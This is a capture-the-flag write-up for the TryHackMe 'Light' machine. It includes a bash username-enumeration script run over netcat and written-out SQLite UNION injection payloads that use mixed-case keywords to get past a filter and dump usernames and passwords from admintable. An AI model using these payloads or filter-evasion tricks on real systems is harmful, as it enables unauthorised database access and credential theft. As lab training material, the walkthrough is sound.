Light is an EASY machine from Try Hack Me platform. On this machine we will have to exploit a SQLi vulnerability of a SQLITE database in order to obtain usernames, passwords and the CTF flag.
Let’s start by connecting via netcat to the target machine using the port 1337 as it’s said in the machine’s description.
data:image/s3,"s3://crabby-images/5e64e/5e64ee6fbf2ae63ee234d45952bdcf84e0f0336d" alt=""
It looks like a client that asks you for an username and, if it exists, it returns the password of that user (or it seems so). I used the username provided in the description and got its password. Tried also with admin
and root
usernames without any success.
smokey:vYQ5ngPpw8AdUmL
Let’s do a port scan to see if there is any other service running on the target machine:
data:image/s3,"s3://crabby-images/6b89d/6b89dda9ab32440eb14724db3c6925d5c9de741d" alt=""
The SSH port is open.
data:image/s3,"s3://crabby-images/21111/21111d1059ad50b269a77eab77881d4dc6f013cc" alt=""
And it’s using OpenSSH, so let’s try to log in using the smokey credentials:
data:image/s3,"s3://crabby-images/fd57d/fd57d0ad0738dfdef03a4621d45be84ff2f47841" alt=""
Too easy to be true. As this client asks for a username, and if it exists returns a message with the password I asked ChatGPT for a simple bash program that will read from a username list file, send each username to the client and wait for the response.
#!/bin/bash
# Verify that the 3 parameters had been set
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <IP> <PORT> <USERLIST>"
exit 1
fi
IP="$1"
PORT="$2"
USERLIST="$3"
# Verify the userlist exists
if [ ! -f "$USERLIST" ]; then
echo "The file $USERLIST does not exist."
exit 1
fi
# Connect with netcat and manage the communication
coproc nc_proc { nc -v "$IP" "$PORT"; }
exec 3<&${nc_proc[0]} 4>&${nc_proc[1]}
# Read and wait for the Welcome message
while IFS= read -r line <&3; do
echo "$line"
if [[ "$line" == *"Welcome to the Light database!"* ]]; then
break
fi
done
# Initialitate counter
lineNumber=0
# Read the file lines and process
while IFS= read -r user; do
((lineNumber++))
# Wait for the "username" message
while IFS= read -r -d ": " line <&3; do
# echo "$line"
if [[ "$line" =~ "username" ]]; then
# Send username with the explicit line jump
echo -e "$user\\n" >&4
break
fi
done
# Wait response
while IFS= read -r line <&3; do
# echo "$line"
if [[ "$line" =~ "Password" ]]; then
pass=$(echo "$line" | awk '{print $NF}')
echo "[!] $user : $pass"
break
else
break
fi
done
done < "$USERLIST"
# Close connections
exec 3<&-
exec 4>&-
Using this tool along with a username list from SecLists, I managed to discover some usernames and their passwords.
data:image/s3,"s3://crabby-images/12aa8/12aa8ff91e64d4d03a1642a63bdca29637b28ec2" alt=""
[!] michael : 7DV4dwA0g5FacRe
[!] john : e74tqwRh2oApPo6
[!] steve : WObjufHX1foR8d7
[!] battery : vYQ5ngPpw8AdUmL
[!] internet :YO1U9O1m52aJImA
[!] logan : yAn4fPaF2qpCKpR
[!] Joseph : tF8tj2o94WE4LKC
I tried to connect via SSH using that credentials, without success. At that time I was wondering if the passwords could be encoded, but after some tries I didn’t managed to decoded them.
Doing a recap I realized that I overlooked something… The first message is telling me that I’m accessing a database. Let’s check if it’s vulnerable to SQL Injection:
data:image/s3,"s3://crabby-images/117e8/117e867487cf8941b3af30468142683fac83d238" alt=""
It seems to be vulnerable! By looking at the error thrown, I guess that the query that the server is done should be something like SELECT password FROM database WHERE username = '$USER_INPUT' LIMIT 30;
Apparently, the user input is being filtered, because it doesn’t allow me to send --
,/*
or %0b
, so I’m unable to comment the final part of the query.
data:image/s3,"s3://crabby-images/d5fcd/d5fcd0356ae439d1a1bbbcd887759f93a92ae793" alt=""
I sent smokey' union select schema_name from information_schema.schemata
so, if my guess is not wrong, the complete query should be something like SELECT password FROM database WHERE username = 'smokey' union select schema_name from information_schema.schemata' LIMIT 30;
The client throws an error, telling me that it doesn’t like a word I sent. I tried sending union
and it seems to be the problematic word. If I send an uppercase UNION
it throws the same error, but if I use a combination of uppercase and lowercase letters, the client allows the input. Knowing that, I’ll use this combination to write every key word just in case.
I also noticed that my query was not correct, so I fixed it to be smokey' Union Select schema_name From information_schema.schemata Union Select '
so the complete query should be: SELECT password FROM database WHERE username = 'smokey' union select schema_name from information_schema.schemata Union Select '' LIMIT 30;
data:image/s3,"s3://crabby-images/795b2/795b27adac035f71f533259f8c2ab11f12478421" alt=""
And the client reported that the database has no the table information_schema.schemata. It might mean that the database is not using MySQL and maybe is using SQL Lite. According to this page of PayloadsAllTheThings we can extract the database table name by using the query SELECT tbl_name FROM sqlite_master WHERE type='table'
, so let’s try it:
Smokey' Union Select tbl_name From sqlite_master Where type='table
data:image/s3,"s3://crabby-images/3663e/3663eac3756e0790f17f3986f13e1d3733435416" alt=""
The output of the client says that the name of the table is admintable. I messed it up by changing the username from smokey to Smokey, but it seems to work (and it doesn’t add more text to the output), so let’s continue like that.
Now, let’s try to extract the column names of admintable by using the input: Smokey' Union Select sql From sqlite_master Where type!='meta' And sql Not Null And name='admintable
data:image/s3,"s3://crabby-images/a7bd3/a7bd38a341c63e5b198bc07f5efc821fe046b936" alt=""
The column names are id, username and password. Now we can try to extract the username and passwords of all users:
Smokey' Union Select username From admintable Where id='1
Smokey' Union Select password From admintable Where id='1
data:image/s3,"s3://crabby-images/7c5b6/7c5b6ef27e1f05fe2de0838f2de46676fb5d222b" alt=""
The user assigned to id=1 seems to be the admin user: TryHackMeAdmin:mamZtAuMlrsEy5bp6q17
data:image/s3,"s3://crabby-images/c9b2e/c9b2ef08bbed31726d92a9e1599bb0c048d143d3" alt=""
I tried to log in via SSH using that credentials, but nope.
Also, the database client doesn’t seems to recognize the username.
data:image/s3,"s3://crabby-images/5e660/5e660d30af370bdb2ce4ce6f2c332f5d032b37f4" alt=""
By enumerating the next id from the database, I found the flag of this CTF.